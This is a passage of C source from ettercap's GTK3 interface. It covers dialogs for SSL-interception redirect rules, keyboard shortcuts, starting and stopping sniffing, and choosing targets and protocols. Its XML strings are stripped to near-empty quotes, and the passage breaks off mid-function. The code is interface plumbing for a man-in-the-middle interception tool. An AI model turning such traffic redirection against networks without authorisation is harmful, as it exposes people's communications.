(sslredir_window)) gtk_window_present(GTK_WINDOW (sslredir_window)); else gtkui_page_present(sslredir_window); return; } sslredir_window = gtkui_page_new("SSL Intercept", >kui_sslredir_close, >kui_sslredir_detach); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER(sslredir_window), vbox); /* rules list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW(scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW(scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER(scrolled), treeview); selection = gtk_tree_view_get_selection(GTK_TREE_VIEW(treeview)); gtk_tree_selection_set_mode(selection, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new(); column = gtk_tree_view_column_new_with_attributes("IP Version", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id(column, 1); gtk_tree_view_append_column(GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new(); column = gtk_tree_view_column_new_with_attributes("Server IP", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id(column, 2); gtk_tree_view_append_column(GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new(); column = gtk_tree_view_column_new_with_attributes("Service", renderer, "text", 6, NULL); gtk_tree_view_column_set_sort_column_id(column, 6); gtk_tree_view_append_column(GTK_TREE_VIEW(treeview), column); gtkui_sslredir_create_lists(); model = gtk_tree_model_sort_new_with_model(GTK_TREE_MODEL(redirrules)); gtk_tree_view_set_model(GTK_TREE_VIEW(treeview), model); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_with_mnemonic("_Insert new redirect"); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); if (proto_list) g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(gtkui_sslredir_add), model); else gtk_widget_set_sensitive(button, FALSE); button = gtk_button_new_with_mnemonic("_Remove redirect"); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); if (proto_list) g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(gtkui_sslredir_del), model); else gtk_widget_set_sensitive(button, FALSE); /* context menu */ context_menu = gtk_menu_new(); items = gtk_menu_item_new_with_label("Remove redirect"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), items); g_signal_connect(G_OBJECT(items), "activate", G_CALLBACK(gtkui_sslredir_del), model); gtk_widget_show(items); items = gtk_menu_item_new_with_label("Remove all redirects"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), items); g_signal_connect(G_OBJECT(items), "activate", G_CALLBACK(gtkui_sslredir_del_all), model); gtk_widget_show(items); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); /* remove entries if delete key is pressed */ g_signal_connect(G_OBJECT(treeview), "key-press-event", G_CALLBACK(gtkui_sslredir_key_pressed), model); gtk_widget_show_all(sslredir_window); } /* Add a new line to the Rules list */ static void gtkui_sslredir_add(GtkWidget *widget, gpointer data) { GtkWidget *dialog, *content, *grid, *destination, *label, *frame; GtkWidget *proto, *af; GtkTreeModel *model; GtkTreeIter iter; GtkCellRenderer *cell1, *cell2; GVariant *gv_from_port, *gv_to_port; int ret = 0; guint16 from_port, to_port; gchar *name; const gchar *server; ec_redir_proto_t ip_ver; /* unused variabled */ (void) widget; (void) data; DEBUG_MSG("gtkui_sslredir_add()"); /* compile IP protocol family list if not already done */ if (af_list == NULL) { af_list = gtk_list_store_new(2, G_TYPE_STRING, /* human friendly name */ G_TYPE_UINT); /* protocol number for redirect */ gtk_list_store_append(af_list, &iter); gtk_list_store_set(af_list, &iter, 0, "IPv4", 1, EC_REDIR_PROTO_IPV4, -1); #ifdef WITH_IPV6 gtk_list_store_append(af_list, &iter); gtk_list_store_set(af_list, &iter, 0, "IPv6", 1, EC_REDIR_PROTO_IPV6, -1); #endif } dialog = gtk_dialog_new_with_buttons("Create new redirect rule", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_Insert", GTK_RESPONSE_OK, NULL); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_set_border_width(GTK_CONTAINER(content), 20); frame = gtk_frame_new("Redirect specification"); gtk_container_add(GTK_CONTAINER(content), frame); gtk_widget_set_margin_bottom(frame, 10); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_widget_set_halign(grid, GTK_ALIGN_CENTER); gtk_container_set_border_width(GTK_CONTAINER(grid), 8); gtk_container_add(GTK_CONTAINER(frame), grid); label = gtk_label_new("IP Version:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP, 1, 1); af = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(af), GTK_TREE_MODEL(af_list)); gtk_combo_box_set_active(GTK_COMBO_BOX(af), 0); cell1 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(af), cell1, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(af), cell1, "text", 0, NULL); gtk_grid_attach(GTK_GRID(grid), af, GTK_POS_LEFT+1, GTK_POS_TOP, 1, 1); label = gtk_label_new("Server IP:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+1, 1, 1); destination = gtk_entry_new(); gtk_entry_set_text(GTK_ENTRY(destination), "0.0.0.0/0"); gtk_grid_attach(GTK_GRID(grid), destination, GTK_POS_LEFT+1, GTK_POS_TOP+1, 1, 1); label = gtk_label_new("Service:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+2, 1, 1); proto = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(proto), GTK_TREE_MODEL(proto_list)); gtk_combo_box_set_active(GTK_COMBO_BOX(proto), 0); cell2 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(proto), cell2, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(proto), cell2, "text", 1, NULL); gtk_grid_attach(GTK_GRID(grid), proto, GTK_POS_LEFT+1, GTK_POS_TOP+2, 1, 1); g_signal_connect(G_OBJECT(af), "changed", G_CALLBACK(gtkui_sslredir_af_changed), destination); gtk_widget_show_all(dialog); gtk_widget_grab_focus(destination); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); /* extract information from widgets */ model = gtk_combo_box_get_model(GTK_COMBO_BOX(af)); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(af), &iter); gtk_tree_model_get(model, &iter, 1, &ip_ver, -1); model = gtk_combo_box_get_model(GTK_COMBO_BOX(proto)); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(proto), &iter); gtk_tree_model_get(model, &iter, 0, &name, 2, &gv_from_port, 3, &gv_to_port, -1); /* convert back from GVariant to uint16 */ from_port = g_variant_get_uint16(gv_from_port); to_port = g_variant_get_uint16(gv_to_port); server = gtk_entry_get_text(GTK_ENTRY(destination)); /* execute redirect action */ ret = ec_redirect(EC_REDIR_ACTION_INSERT, name, ip_ver, server, from_port, to_port); /* inform user if redirect execution wasn't successful */ if (ret != E_SUCCESS) gtkui_infobar_show(GTK_MESSAGE_ERROR, "Insertion of redirect rule failed."); else { /* otherwise add rule to rules list */ gtk_list_store_append(redirrules, &iter); gtk_list_store_set(redirrules, &iter, 0, ip_ver, 1, (ip_ver == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"), 2, server, 3, gv_from_port, 4, gv_to_port, 5, ec_strlc(name), 6, ec_struc(name), -1); } } gtk_widget_destroy(dialog); } /* * remove selected redirect rules */ void gtkui_sslredir_del(GtkWidget *widget, gpointer data) { GList *list; GtkTreeIter iter, iter_unsorted; GtkTreeModel *model; GVariant *gv_from_port, *gv_to_port; int ret; gchar *name; const gchar *server; guint16 from_port, to_port; ec_redir_proto_t ip_ver; /* variable not used */ (void) widget; DEBUG_MSG("gtkui_sslredir_del()"); model = gtk_tree_model_sort_get_model(GTK_TREE_MODEL_SORT(data)); /* get selected entries */ if (gtk_tree_selection_count_selected_rows(selection) > 0) { list = gtk_tree_selection_get_selected_rows(selection, &model); for (list = g_list_last(list); list; list = g_list_previous(list)) { /* extract parameters from GtkTreeView model */ gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get(model, &iter, 0, &ip_ver, 2, &server, 3, &gv_from_port, 4, &gv_to_port, 5, &name, -1); /* convert back from GVariant to uint16 */ from_port = g_variant_get_uint16(gv_from_port); to_port = g_variant_get_uint16(gv_to_port); /* execute redirect action */ ret = ec_redirect(EC_REDIR_ACTION_REMOVE, name, ip_ver, server, from_port, to_port); /* inform user if redirect execution wasn't successful */ if (ret != E_SUCCESS) gtkui_infobar_show(GTK_MESSAGE_ERROR, "Removal of redirect rule failed."); else { /* otherwise remove from list */ gtk_tree_model_sort_convert_iter_to_child_iter( GTK_TREE_MODEL_SORT(data), &iter_unsorted, &iter); gtk_list_store_remove(GTK_LIST_STORE(redirrules), &iter_unsorted); } } /* free the list of selection */ g_list_free_full(list, (GDestroyNotify)gtk_tree_path_free); } } /* * select all entries in TreeModel then then call gtkui_sslredir_del */ void gtkui_sslredir_del_all(GtkWidget *widget, gpointer data) { DEBUG_MSG("gtkui_sslredir_del_all():"); gtk_tree_selection_select_all(selection); gtkui_sslredir_del(widget, data); } /* detach ssl redir tab */ static void gtkui_sslredir_detach(GtkWidget *child) { sslredir_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW(sslredir_window), "SSL Intercept"); gtk_window_set_default_size(GTK_WINDOW(sslredir_window), 500, 250); g_signal_connect(G_OBJECT(sslredir_window), "delete_event", G_CALLBACK(gtkui_sslredir_close), NULL); gtkui_page_attach_shortcut(sslredir_window, gtkui_sslredir_attach); gtk_container_add(GTK_CONTAINER(sslredir_window), child); gtk_window_present(GTK_WINDOW(sslredir_window)); } /* callback for reattaching the detached ssl redir tab */ static void gtkui_sslredir_attach(void) { gtkui_sslredir_close(); gtkui_sslredir_show(NULL, NULL, NULL); } /* close ssl redir tab */ static void gtkui_sslredir_close(void) { DEBUG_MSG("gtk_sslredir_close"); gtk_widget_destroy(sslredir_window); sslredir_window = NULL; } /* * create the list for the list of interceptable protocols */ static void gtkui_sslredir_create_lists(void) { int res; DEBUG_MSG("gtk_sslredir_create_lists()"); /* populate redirect rules */ if (redirrules == NULL) { redirrules = gtk_list_store_new(7, G_TYPE_UINT, /* IP address family */ G_TYPE_STRING, /* IP address family human readable */ G_TYPE_STRING, /* destination definition */ G_TYPE_VARIANT, /* protocol registered port */ G_TYPE_VARIANT, /* ettercap listener port */ G_TYPE_STRING, /* protocol name lower case */ G_TYPE_STRING); /* protocol name upper case */ /* walk through list of registered redirects */ res = ec_walk_redirects(>kui_sslredir_add_list); if (res == -E_NOTFOUND) { DEBUG_MSG("gtk_sslredir_create_lists(): no redirects registered - " "apparently no redirect commands enabled in etter.conf"); gtkui_infobar_show(GTK_MESSAGE_WARNING, "Traffic redirect not enabled in etter.conf. "); } } /* populate registered services */ if (proto_list == NULL) { proto_list = gtk_list_store_new(4, G_TYPE_STRING, /* protocol name lower case */ G_TYPE_STRING, /* protocol name upper case */ G_TYPE_VARIANT, /* protocol registered port */ G_TYPE_VARIANT);/* ettercap listener port */ res = ec_walk_redirect_services(>kui_sslredir_add_service); if (res == -E_NOTFOUND) { g_object_unref(proto_list); proto_list = NULL; } } } /* * callback function to compose the list of active services */ static void gtkui_sslredir_add_service(struct serv_entry *se) { GVariant *gv_from_port, *gv_to_port; GtkTreeIter iter; DEBUG_MSG("gtkui_sslredir_add_service(%s)", se->name); /* Make GVariant from uint16 */ gv_from_port = g_variant_new_uint16(se->from_port); gv_to_port = g_variant_new_uint16(se->to_port); /* update protocol list store */ gtk_list_store_append(proto_list, &iter); gtk_list_store_set(proto_list, &iter, 0, ec_strlc(se->name), 1, ec_struc(se->name), 2, gv_from_port, 3, gv_to_port, -1); } /* * callback function to compose the list of active redirects */ static void gtkui_sslredir_add_list(struct redir_entry *re) { GVariant *gv_from_port, *gv_to_port; GtkTreeIter iter; DEBUG_MSG("gtkui_sslredir_add_list(%s)", re->name); /* make GVariant from uint16 */ gv_from_port = g_variant_new_uint16(re->from_port); gv_to_port = g_variant_new_uint16(re->to_port); /* add rule to rules list */ gtk_list_store_append(redirrules, &iter); gtk_list_store_set(redirrules, &iter, 0, re->proto, 1, (re->proto == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"), 2, re->destination, 3, gv_from_port, 4, gv_to_port, 5, ec_strlc(re->name), 6, ec_struc(re->name), -1); } /* * callback when IP address family is changed * - update preset string of source / destination entry widgets */ void gtkui_sslredir_af_changed(GtkWidget *widget, gpointer data) { GtkTreeModel *model; GtkTreeIter iter; ec_redir_proto_t proto; model = gtk_combo_box_get_model(GTK_COMBO_BOX(widget)); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(widget), &iter); gtk_tree_model_get(model, &iter, 1, &proto, -1); switch (proto) { case EC_REDIR_PROTO_IPV4: gtk_entry_set_text(GTK_ENTRY(data), "0.0.0.0/0"); gtk_widget_grab_focus(data); break; case EC_REDIR_PROTO_IPV6: gtk_entry_set_text(GTK_ENTRY(data), "::/0"); gtk_widget_grab_focus(data); break; default: break; } } /* * callback function when delete key is pressed in redirect rule list */ gboolean gtkui_sslredir_key_pressed(GtkWidget *widget, GdkEventKey *event, gpointer data) { DEBUG_MSG("gtkui_sslredir_key_pressed()"); if (event->keyval == gdk_keyval_from_name("Delete")) { gtkui_sslredir_del(widget, data); return TRUE; } if (event->keyval == gdk_keyval_from_name("Insert")) { gtkui_sslredir_add(widget, data); return TRUE; } /* fall through to other handlers */ return FALSE; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_shortcuts.c000664 000000 000000 00000223637 13711276346 023062 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /* protos */ /* globals */ #if defined GTK_SHORTCUTS_WINDOW static const gchar* dialog_xml = "" "" " " " " " 1" " " " " " 1" " Ettercap Shortcuts" " 12" " " " " " 1" " General" " " " " " 1" " F1" " Help" " " " " " " " " " 1" " <primary>Q" " Quit" " " " " " " " " " " " " " 1" " Setup" " " " " " 1" " <primary>o" " Open PCAP file (offline sniffing)" " " " " " " " " " 1" " <primary>s" " Save PCAP file" " " " " " " " " " 1" " <primary>P" " Set PCAP filter" " " " " " " " " " 1" " <primary>N" " Set netmask" " " " " " " " " " " " " " " " " " 1" " " " " " 1" " Ettercap Shortcuts" " 12" " " " " " 1" " General" " " " " " 1" " F1" " Help" " " " " " " " " " 1" " <primary>Q" " Quit" " " " " " " " " " " " " " 1" " Targets" " " " " " 1" " <primary>t" " Show current targets" " " " " " " " " " 1" " <primary><shift>t" " Select Targets manually" " " " " " " " " " 1" " <primary>P" " Select Protocol" " " " " " " " " " 1" " <primary>W" " Wipe all targets" " " " " " " " " " " " " " 1" " Hosts" " " " " " 1" " <primary>h" " Hosts List" " " " " " " " " " 1" " <primary>s" " Scan for Hosts" " " " " " " " " " " " " " 1" " View" " " " " " 1" " <primary><shift>c" " View Connections" " " " " " " " " " 1" " <primary>o" " View Profiles" " " " " " " " " " 1" " <primary><shift>v" " Set visualization method" " " " " " " " " " 1" " <primary>r" " Set visualization RegEx" " " " " " " " " " " " " " 1" " Filters" " " " " " 1" " <primary>f" " Load Filter" " " " " " " " " " 1" " <primary><shift>f" " Stop Filter" " " " " " " " " " " " " " 1" " Logging" " " " " " 1" " <primary><shift>i" " Log all packets and infos" " " " " " " " " " 1" " <primary>i" " Log only infos" " " " " " " " " " 1" " <primary>m" " Log user messages" " " " " " " " " " " " " " 1" " Plugins" " " " " " 1" " <primary>p" " Plugins List" " " " " " " " " " " " " " " ""; #else // gtk+ < 3.17 static const gchar* dialog_xml = "" " " " False" " Shortcuts" " True" " True" " dialog" " " " " " False" " vertical" " 2" " " " " " False" " end" " " " " " " " " " " " " " " " " " False" " False" " 0" " " " " " " " " " True" " False" " " " " " True" " False" " vertical" " " " " " True" " False" " 5" " 0" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " F1" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Help" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + Q" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Quit" " " " " " 1" " 1" " " " " " " " " " " " " " " " " " True" " False" " General" " " " " " " " " " " " " " " " " " False" " True" " 0" " " " " " " " " " True" " False" " 5" " 0" " none" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + T" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Show current targets" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + Shift + T" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Select targets manually" " " " " " 1" " 1" " " " " " " " " " True" " False" " start" " Ctrl + P" " " " " " 0" " 2" " " " " " " " " " True" " False" " start" " Set Protocol" " " " " " 1" " 2" " " " " " " " " " True" " False" " start" " Ctrl + W" " " " " " 0" " 3" " " " " " " " " " True" " False" " start" " Wipe all targets" " " " " " 1" " 3" " " " " " " " " " " " " " " " " " True" " False" " Targets" " " " " " " " " " " " " " " " " " False" " True" " 1" " " " " " " " " " True" " False" " 5" " 0" " none" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + H" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Hosts List" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + S" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Scan for Hosts" " " " " " 1" " 1" " " " " " " " " " " " " " " " " " True" " False" " Hosts" " " " " " " " " " " " " " " " " " False" " True" " 2" " " " " " " " " " True" " False" " 5" " 0" " none" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + P" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Plugins List" " " " " " 1" " 0" " " " " " " " " " " " " " " " " " True" " False" " Plugins" " " " " " " " " " " " " " " " " " False" " True" " 3" " " " " " " " " " False" " True" " 0" " " " " " " " " " True" " False" " vertical" " " " " " True" " False" " 5" " 0" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + Shift + C" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " View Connections" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + O" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " View Profiles" " " " " " 1" " 1" " " " " " " " " " True" " False" " start" " Ctrl + R" " " " " " 0" " 3" " " " " " " " " " True" " False" " start" " Ctrl + Shift + V" " " " " " 0" " 2" " " " " " " " " " True" " False" " start" " Set visualization method" " " " " " 1" " 2" " " " " " " " " " True" " False" " start" " Set visualization RegEx" " " " " " 1" " 3" " " " " " " " " " " " " " " " " " True" " False" " View" " " " " " " " " " " " " " " " " " False" " True" " 0" " " " " " " " " " True" " False" " 5" " 0" " none" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + F" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Load Filter" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + Shift + F" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Stop Filter" " " " " " 1" " 1" " " " " " " " " " " " " " " " " " True" " False" " Filters" " " " " " " " " " " " " " " " " " False" " True" " 1" " " " " " " " " " True" " False" " 5" " 0" " none" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + Shift + I" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Log all packets and infos" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + I" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Log only infos" " " " " " 1" " 1" " " " " " " " " " True" " False" " start" " Ctrl + M" " " " " " 0" " 2" " " " " " " " " " True" " False" " start" " Log user messages" " " " " " 1" " 2" " " " " " " " " " " " " " " " " " True" " False" " Logging" " " " " " " " " " " " " " " " " " False" " True" " 2" " " " " " " " " " False" " True" " 1" " " " " " " " " " False" " True" " 1" " " " " " " " " " " " " " False" " Shortcuts" " True" " True" " dialog" " " " " " False" " vertical" " 2" " " " " " False" " end" " " " " " " " " " " " " " " " " " False" " False" " 0" " " " " " " " " " True" " False" " vertical" " " " " " True" " False" " 5" " 0" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " F1" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Help" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + Q" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Quit" " " " " " 1" " 1" " " " " " " " " " " " " " " " " " True" " False" " General" " " " " " " " " " " " " " " " " " False" " True" " 0" " " " " " " " " " True" " False" " 5" " 0" " none" " " " " " True" " False" " 12" " " " " " True" " False" " 2" " 8" " " " " " True" " False" " start" " Ctrl + O" " " " " " 0" " 0" " " " " " " " " " True" " False" " start" " Open PCAP file (offline sniffing)" " " " " " 1" " 0" " " " " " " " " " True" " False" " start" " Ctrl + S" " " " " " 0" " 1" " " " " " " " " " True" " False" " start" " Save PCAP file" " " " " " 1" " 1" " " " " " " " " " True" " False" " start" " Ctrl + P" " " " " " 0" " 2" " " " " " " " " " True" " False" " start" " Set PCAP Filter" " " " " " 1" " 2" " " " " " " " " " True" " False" " start" " Ctrl + N" " " " " " 0" " 3" " " " " " " " " " True" " False" " start" " Set Netmask" " " " " " 1" " 3" " " " " " " " " " " " " " " " " " True" " False" " Setup" " " " " " " " " " " " " " " " " " False" " True" " 1" " " " " " " " " " False" " True" " 1" " " " " " " " " " " ""; #endif /***************************************************/ /* * Since GMenu doesn't show accelerators in the menu, it became * popular to introduce an dedicated window for that * since gtk+3.17, the library even provides an own window-type * for this use case */ void gtkui_show_shortcuts(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *shortcut_window; GtkBuilder *builder; (void) action; (void) data; builder = gtk_builder_new(); gtk_builder_add_from_string(builder, dialog_xml, -1, NULL); shortcut_window = GTK_WIDGET(gtk_builder_get_object(builder, g_variant_get_string(value, NULL))); gtk_window_set_transient_for(GTK_WINDOW(shortcut_window), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(shortcut_window), GTK_WIN_POS_CENTER_ON_PARENT); gtk_widget_show_all(shortcut_window); g_object_unref(builder); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_start.c000664 000000 000000 00000002261 13711276346 022145 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ void gtkui_start_sniffing(void) { DEBUG_MSG("gtk_start_sniffing"); /* start the sniffing method */ EXECUTE(EC_GBL_SNIFF->start); } void gtkui_stop_sniffing(void) { DEBUG_MSG("gtk_stop_sniffing"); /* terminate the sniffing engine */ EXECUTE(EC_GBL_SNIFF->cleanup); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_targets.c000664 000000 000000 00000054513 13711276346 022470 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void set_targets(void); static void gtkui_add_target1(void *); static void gtkui_add_target2(void *); static void add_target1(void); static void add_target2(void); static void gtkui_delete_targets(GtkWidget *widget, gpointer data); static void gtkui_targets_destroy(void); static void gtkui_targets_detach(GtkWidget *child); static void gtkui_targets_attach(void); /* globals */ static char thost[MAX_ASCII_ADDR_LEN]; GtkWidget *targets_window = NULL; GtkTreeSelection *selection1 = NULL; GtkTreeSelection *selection2 = NULL; GtkListStore *liststore1 = NULL; GtkListStore *liststore2 = NULL; /*******************************************/ void toggle_reverse(GSimpleAction *action, GVariant *value, gpointer data) { (void) data; g_simple_action_set_state(action, value); EC_GBL_OPTIONS->reversed ^= 1; } /* * wipe the targets struct setting both T1 and T2 to ANY/ANY/ANY */ void wipe_targets(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; DEBUG_MSG("wipe_targets"); reset_display_filter(EC_GBL_TARGET1); reset_display_filter(EC_GBL_TARGET2); /* update the GTK liststores */ gtkui_create_targets_array(); /* display the message */ gtkui_message("TARGETS were reset to ANY/ANY/ANY"); } /* * display the protocol dialog */ void gtkui_select_protocol(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *content, *radio, *hbox, *frame; GSList *list = NULL; gint active = 1; enum {proto_udp, proto_tcp, proto_all}; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_select_protocol"); /* this will contain 'all', 'tcp' or 'udp' */ if (!EC_GBL_OPTIONS->proto) { SAFE_CALLOC(EC_GBL_OPTIONS->proto, 4, sizeof(char)); strncpy(EC_GBL_OPTIONS->proto, "all", 4); } /* create dialog for selecting the protocol */ dialog = gtk_dialog_new_with_buttons("Set protocol", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_set_border_width(GTK_CONTAINER(content), 10); frame = gtk_frame_new("Select the protocol"); gtk_container_add(GTK_CONTAINER(content), frame); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 10); gtk_container_add(GTK_CONTAINER(frame), hbox); radio = gtk_radio_button_new_with_mnemonic(NULL, "a_ll"); gtk_box_pack_start(GTK_BOX(hbox), radio, TRUE, TRUE, 5); if (!strncasecmp(EC_GBL_OPTIONS->proto, "all", 4)) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radio), TRUE); radio = gtk_radio_button_new_with_mnemonic_from_widget(GTK_RADIO_BUTTON(radio), "_tcp"); gtk_box_pack_start(GTK_BOX(hbox), radio, TRUE, TRUE, 5); if (!strncasecmp(EC_GBL_OPTIONS->proto, "tcp", 4)) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radio), TRUE); radio = gtk_radio_button_new_with_mnemonic_from_widget(GTK_RADIO_BUTTON(radio), "_udp"); gtk_box_pack_start(GTK_BOX(hbox), radio, TRUE, TRUE, 5); if (!strncasecmp(EC_GBL_OPTIONS->proto, "udp", 4)) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radio), TRUE); gtk_widget_grab_focus(gtk_dialog_get_widget_for_response(GTK_DIALOG(dialog), GTK_RESPONSE_OK)); gtk_widget_show_all(dialog); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { list = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radio)); for(active = 0; list != NULL; list = list->next) { if (gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON(list->data))) { switch (active) { case proto_all: strncpy(EC_GBL_OPTIONS->proto, "all", 4); break; case proto_tcp: strncpy(EC_GBL_OPTIONS->proto, "tcp", 4); break; case proto_udp: strncpy(EC_GBL_OPTIONS->proto, "udp", 4); break; } } active++; } } gtk_widget_destroy(dialog); } /* * display the TARGET(s) dialog */ void gtkui_select_targets(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, 